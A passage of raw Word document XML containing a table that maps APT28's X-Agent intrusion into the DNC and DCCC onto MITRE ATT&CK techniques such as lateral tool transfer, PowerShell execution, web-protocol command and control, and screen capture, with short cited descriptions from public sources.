                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Lateral Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="669E9C17" w14:textId="07668BDB" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DD71B69" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70436B0D" w14:textId="77777777" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656EBEBE" w14:textId="0DCBA6EF" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00743FA9" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-LMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D8FDED" w14:textId="6641D404" w:rsidR="00896477" w:rsidRPr="00842B32" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00780B73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">26 </w:t>
            </w:r>
            <w:r>
              <w:t>In or around April 2016, the Conspirators installed X-Agent malware on the DNC network, including the same versions installed on the DCCC network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00B857D7" w14:paraId="78C15287" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4986757F" w14:textId="6BBE0BF1" w:rsidR="00896477" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46566719" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBDFB60" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">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42619526" w14:textId="766BF3F2" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A3B5A3" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="077BF819" w14:textId="77777777" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E98E4E" w14:textId="3EDCE2E5" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50051B27" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00105B0A" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>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communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEF98AF" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00105B0A" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00ED5880" w14:paraId="249C98B1" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B88070C" w14:textId="60C793E4" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C831088" w14:textId="38092D24" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">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sidR="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B1DFB95" w14:textId="54A85ED3" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78497C96" w14:textId="4565F929" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="363D7144" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E2F1165" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBB4BC6" w14:textId="60B0B3FD" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC074C2" w14:textId="77777777" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C5179A">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0021166F" w:rsidRPr="0021166F">
              <w:t>XAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0021166F" w:rsidRPr="0021166F">
              <w:t xml:space="preserve"> has ability to receive commands from threat actors via its </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="0021166F" w:rsidRPr="0021166F">
              <w:t>command and control</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0021166F" w:rsidRPr="0021166F">
              <w:t xml:space="preserve"> channel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1256BCFB" w14:textId="2D39E182" w:rsidR="00C5179A" w:rsidRPr="00ED5880" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C5179A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] APT28 downloads and executes PowerShell scripts and performs PowerShell commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00B857D7" w14:paraId="3F4A89E7" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269A77EC" w14:textId="7AA42768" w:rsidR="00896477" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EF7665D" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441EB828" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">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w:t>
            </w:r>
            <w:r w:rsidRPr="008001A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698B9D1D" w14:textId="50C5582A" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C173F6C" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E8DC91" w14:textId="77777777" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A626159" w14:textId="61775878" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3D4F6C" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00105B0A" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>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w:t>
            </w:r>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1CD5FF" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00105B0A" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00ED5880" w14:paraId="45BCE2EA" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29993CE9" w14:textId="45272EE6" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76C26FE3" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C4B4EFA" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10219BDF" w14:textId="0F784238" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="746585B0" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C69C4F" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F6767C7" w14:textId="7D419C34" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1699393D" w14:textId="2445B00C" w:rsidR="00762933" w:rsidRDefault="00896477" w:rsidP="00762933">
            <w:r>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidR="00780B73">
              <w:t xml:space="preserve"> 26 </w:t>
            </w:r>
            <w:r w:rsidR="00762933">
              <w:t>collected</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E39429B" w14:textId="0F35A7C3" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00762933" w:rsidP="00762933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">thousands of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and screenshot results from the DCCC and DNC computers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00ED5880" w14:paraId="578EEEEB" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5A0418" w14:textId="5DAAC775" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00040680" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
